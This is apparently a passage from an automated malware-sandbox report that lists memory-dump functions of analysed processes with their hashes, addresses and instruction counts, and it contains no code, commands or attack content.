                                                                  • Opcode ID: 27389b39a5550def0a6a71a9e4f09941bc105c974b141adcee15a1985c5174a0
                                                                  • Instruction ID: 81600afffdfe3d14cd0b00067c5d16c1cd0dcb70a05aea64b4b6f42afcb7f77a
                                                                  • Opcode Fuzzy Hash: 27389b39a5550def0a6a71a9e4f09941bc105c974b141adcee15a1985c5174a0
                                                                  • Instruction Fuzzy Hash: 59D01770600318DFEBA0EF26E854AAA77B6AB45200F20059AC00A6B248DF345EC08F81
                                                                  Function 07033B32 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 145d6451379ba21f4b1d2a989f90af317084ca169f1ea90b3ea0696a4e917763
                                                                  • Instruction ID: b4497f247523f50140c22a1cfe251dd4a9a08f85b5c6096557382512e9fcd3bd
                                                                  • Opcode Fuzzy Hash: 145d6451379ba21f4b1d2a989f90af317084ca169f1ea90b3ea0696a4e917763
                                                                  • Instruction Fuzzy Hash: 4CD05EB0204154CFD7059F64C48CAFAB7BAEB4A309F2A4098D16E97649DF7A4986CB02
                                                                  Function 01343894 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b795c0bc4a8b77d9419cc70530966c3aa32d2d39985c24a830db16077a98c5a8
                                                                  • Instruction ID: 4b4830774428977ebdf8e7d5b3b0915dc22c6db5c4f3808002f03bf5a2535e1a
                                                                  • Opcode Fuzzy Hash: b795c0bc4a8b77d9419cc70530966c3aa32d2d39985c24a830db16077a98c5a8
                                                                  • Instruction Fuzzy Hash: A2D09278A05229DFDF708F10D848BD9B7B6BB49304F0011D6D58DA3650CB355A858F05
                                                                  Function 01340A65 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b863ecc5c317d46f95f4b6f35639bb169040a6d8208e618d1f4a5cfc39013bf
                                                                  • Instruction ID: 06d8834ef2ad5fa80f5b3725c05e138b51fe43f698634c352ce7e7d0d20ee000
                                                                  • Opcode Fuzzy Hash: 8b863ecc5c317d46f95f4b6f35639bb169040a6d8208e618d1f4a5cfc39013bf
                                                                  • Instruction Fuzzy Hash: D5C08C20B0410A5BC64CEAB920602BC28DB3BC92A8322491EA207EB788DD649D022716
                                                                  Function 01340841 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9012d2c3c9fea51c0473ff8f7a4adccfe5a4cf30c056ba9ea952e0a4abf4302a
                                                                  • Instruction ID: fd200e8964360e460fd86ad595e29cb02224e5e8fdcbae0beacaeab71d73d092
                                                                  • Opcode Fuzzy Hash: 9012d2c3c9fea51c0473ff8f7a4adccfe5a4cf30c056ba9ea952e0a4abf4302a
                                                                  • Instruction Fuzzy Hash: 6CC0807144D340CFD7560F60545A1837FB09E1231370744EDD041C5117F75C4C058721
                                                                  Function 06C473E0 Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a359f319e2672b97e7528622af2446680beb4b0659be6b6611e3daf591b4ba54
                                                                  • Instruction ID: c4b00a3a6628923d84597c130a02f2c66c1ca3fab1322f5307e5e3ba79f0b485
                                                                  • Opcode Fuzzy Hash: a359f319e2672b97e7528622af2446680beb4b0659be6b6611e3daf591b4ba54
                                                                  • Instruction Fuzzy Hash: 70C00276E1001A9A8B00DAD9E4408DCB774EB94321B004427D614A6144D63115668F55
                                                                  Function 01340A57 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61d11c75de2ffb8c7407ad75b67d97d1f2c4344a4309327e03baa4f0d0564954
                                                                  • Instruction ID: a9b44fb09e6bf8d10ef5f9cb4bf9508ee9590e283f49f00398bc71e6476810a5
                                                                  • Opcode Fuzzy Hash: 61d11c75de2ffb8c7407ad75b67d97d1f2c4344a4309327e03baa4f0d0564954
                                                                  • Instruction Fuzzy Hash: 65B0923010A2498BC2699F609809AB53ABC5A9120E3164581E18282CAAC22D68448726

                                                                  Executed Functions

                                                                  Function 024C1A30 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7@Z
                                                                  • API String ID: 0-2778914280
                                                                  • Opcode ID: 69cb06e4f0e3a4ba16ed4a9b264bc3db25143b01e3477f0640ccb31e46263577
                                                                  • Instruction ID: 7fd4b1b292b4f29d44988acffdbf1f52ef525fe2b76b136a38d715285011c61c
                                                                  • Opcode Fuzzy Hash: 69cb06e4f0e3a4ba16ed4a9b264bc3db25143b01e3477f0640ccb31e46263577
                                                                  • Instruction Fuzzy Hash: EF916E38A00104CFD784DF69E588BA977F2FF88311F34946AE40A9B36ACB759C95CB10
                                                                  Function 024C1A40 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7@Z
                                                                  • API String ID: 0-2778914280
                                                                  • Opcode ID: 1ca55a60b7c5ebe3166f011bfe0221259267accd0554f0f8b69ee4fc5ce71c30
                                                                  • Instruction ID: 14ec4bbb152582c645b76b48193e2f02f27d0becac2fcb355a8890c994b3ed63
                                                                  • Opcode Fuzzy Hash: 1ca55a60b7c5ebe3166f011bfe0221259267accd0554f0f8b69ee4fc5ce71c30
                                                                  • Instruction Fuzzy Hash: 23814E38A10104CFD784DF69E588BA977F2FF88311F34946AE10A9B76ACB759C95CB10
                                                                  Function 024C20A9 Relevance: .3, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 631ace4aead2d1ee5e6bf96ef2b7c0dbabfd6cc9a4fb0adedbd0dd061b97649c
                                                                  • Instruction ID: 4923146988ad9ce297909e56af58e92f35f2d16b154b9773eb78a9447360cc1d
                                                                  • Opcode Fuzzy Hash: 631ace4aead2d1ee5e6bf96ef2b7c0dbabfd6cc9a4fb0adedbd0dd061b97649c
                                                                  • Instruction Fuzzy Hash: 86A18178A001109FD715DF69D554AADBBF2BF88310F61856ED805AB3A5DBB4EC02CF90
                                                                  Function 024C18C0 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 820248a71640fceb309bca5a8acd77768d843478c1ab61c4032322d01dd9cf6c
                                                                  • Instruction ID: e46ba2a380761ed3dff6e5fb29045a977d749ce076f31ad464ee64f34f36f616
                                                                  • Opcode Fuzzy Hash: 820248a71640fceb309bca5a8acd77768d843478c1ab61c4032322d01dd9cf6c
                                                                  • Instruction Fuzzy Hash: 42317E387081419FD784DA7AD885B7A77E6EF84220F34846BE40DCB35ADB34D846CB61
                                                                  Function 024C17E9 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4d5dfd9c867919be71a21aef7fa23aa50746c49c43f7f61c1bcd7ffdf760c31
                                                                  • Instruction ID: 7f8d3c088c4ec19fbd9dd78aa7b3bcc8d9b8f0702a7b18d9da92d5f43c5fbac2
                                                                  • Opcode Fuzzy Hash: f4d5dfd9c867919be71a21aef7fa23aa50746c49c43f7f61c1bcd7ffdf760c31
                                                                  • Instruction Fuzzy Hash: CF11F538D09248EFCB80DFA9D0843ECBBF1EF46304F6484AAC44D97216D7755A99CB51
                                                                  Function 024C17F8 Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c8c4cc304b76216342fed66d497eeeffe80b880d87cc32f47d222b6ae71ca2a
                                                                  • Instruction ID: 70189b460ff851cedc9145ee28801a46952ef4df620fed5861b2e2c7720ee081
                                                                  • Opcode Fuzzy Hash: 6c8c4cc304b76216342fed66d497eeeffe80b880d87cc32f47d222b6ae71ca2a
                                                                  • Instruction Fuzzy Hash: 5D11F078D08208EFCB80EFAAD1447ADBBF1EB45300FB084AAC40CA7316D7345A95CB51
                                                                  Function 024C16B0 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d82ef764cb77380f729f97e5647a32cc877dde516642935a6dcb839bf23e29c5
                                                                  • Instruction ID: c1fec736c93ee4ee608cb509705c2959f0fd7fa5f437163c6849eb050d6a6800
                                                                  • Opcode Fuzzy Hash: d82ef764cb77380f729f97e5647a32cc877dde516642935a6dcb839bf23e29c5
                                                                  • Instruction Fuzzy Hash: 5DF0792848E3C05FC71787B159B54D83F70DD0B02071A0ACACCDA8B4A3C10D682FE722
                                                                  Function 024C0932 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d6287bd8ce004e3fe7b7af95612229040f933f49ede9f5d5fa90ca1234fda92
                                                                  • Instruction ID: ef472c0043a78e8093d1085737dba657c800ce4a5c98581318b8daf1324ac7dc
                                                                  • Opcode Fuzzy Hash: 1d6287bd8ce004e3fe7b7af95612229040f933f49ede9f5d5fa90ca1234fda92
                                                                  • Instruction Fuzzy Hash: C9E0BD1188D3C00FC323037818B94E57FB08D2305971E08CBC8C68B0A3D51A692BEB22
                                                                  Function 024C1761 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46888bc195dbb7a3e89eb000190b0e1de960cc58fdf55d0ac2248eebc24aa276
                                                                  • Instruction ID: 032599f605389344782c3d96d0810f6ce83fe2e810a1c4673b78a71e991ceed0
                                                                  • Opcode Fuzzy Hash: 46888bc195dbb7a3e89eb000190b0e1de960cc58fdf55d0ac2248eebc24aa276
                                                                  • Instruction Fuzzy Hash: FEE01714A4D2D04FCB176BB510B41E93FB1DE4B220B8809CEC9C64B1A3C90D242B9725
                                                                  Function 024C361E Relevance: .0, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 867da9c6ff1867c672bf436f1d3c907caf63de381c401b30f413ad9ba892e3f2
                                                                  • Instruction ID: 933740fd2417b6b1046fb8ada7666e75455620101e63962a51a400946f2efe8a
                                                                  • Opcode Fuzzy Hash: 867da9c6ff1867c672bf436f1d3c907caf63de381c401b30f413ad9ba892e3f2
                                                                  • Instruction Fuzzy Hash: BDC01234A00004ABCB0A9B95E8005AEBAB2EF8C211F60445AE902A2260CE225C149F28
                                                                  Function 024C1700 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: acf82a49790dfcafb89412a0ea71d38d52b99380f0eb015b4121c91d657dc243
                                                                  • Instruction ID: 2cf64cd75d9494a4031d83bcb668faebcf3c0e2a9fb2af34889bb613afd74ee4
                                                                  • Opcode Fuzzy Hash: acf82a49790dfcafb89412a0ea71d38d52b99380f0eb015b4121c91d657dc243
                                                                  • Instruction Fuzzy Hash: FBA01132880A08CB82082BA0B80C20CBB2CEA0CA02BC08820E00E800028B2228288A80
                                                                  Function 024C0960 Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.69853237013.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_24c0000_InstallUtil.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78146d748de50f1bd42951304c7650e372cd6a3792914882f34607beae8ac996
                                                                  • Instruction ID: 34041a0799da0a2cdfe89739a513cfd48313892577cee59b14d2dd6293ab99f3
                                                                  • Opcode Fuzzy Hash: 78146d748de50f1bd42951304c7650e372cd6a3792914882f34607beae8ac996
                                                                  • Instruction Fuzzy Hash: 0790023148460C8B558427D5784D595B75C95845157858451A50D415025E69682085A5